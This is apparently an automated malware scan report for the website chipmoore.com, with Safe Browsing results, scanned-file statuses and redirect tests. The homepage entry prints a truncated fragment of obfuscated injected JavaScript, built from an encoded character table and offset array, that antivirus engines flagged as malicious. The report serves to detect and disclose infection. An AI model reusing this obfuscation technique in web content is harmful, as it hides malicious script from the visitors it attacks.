Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chipmoore.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chipmoore.com/ | 200 OK Content-Length: 6945 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};var ar=" lg {])f'dti(B-E/Neryh}bwo1\"0Tm,=uCpvn<;z[>s.caA:";var ar2="R0,0,44,-16,-16,36,-12,64,80,-48,-12,-48,76,-108,136,-168,64,-32,20,-56,68,48,-48,76,-108,132,-120,28,36,68,-176,60,116,-64,-48,-24,-16,60,8,-64,44,-48,-8,140,-52,-92,4,-8,-16 e(s); Antivirus reports:
| ||
http://chipmoore.com/./javascript/cookieHandler.js | 200 OK Content-Length: 1224 Content-Type: application/javascript | clean |
http://chipmoore.com/./javascript/misc.js | 200 OK Content-Length: 2609 Content-Type: application/javascript | clean |
http://chipmoore.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chipmoore.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:04:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6945
Content-Type: text/html
...6945 bytes of data.
GET / HTTP/1.1
Host: chipmoore.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 20:04:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 6945
Content-Type: text/html
...6945 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chipmoore.com
Referer: http://www.google.com/search?q=chipmoore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: chipmoore.com
Referer: http://www.google.com/search?q=chipmoore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.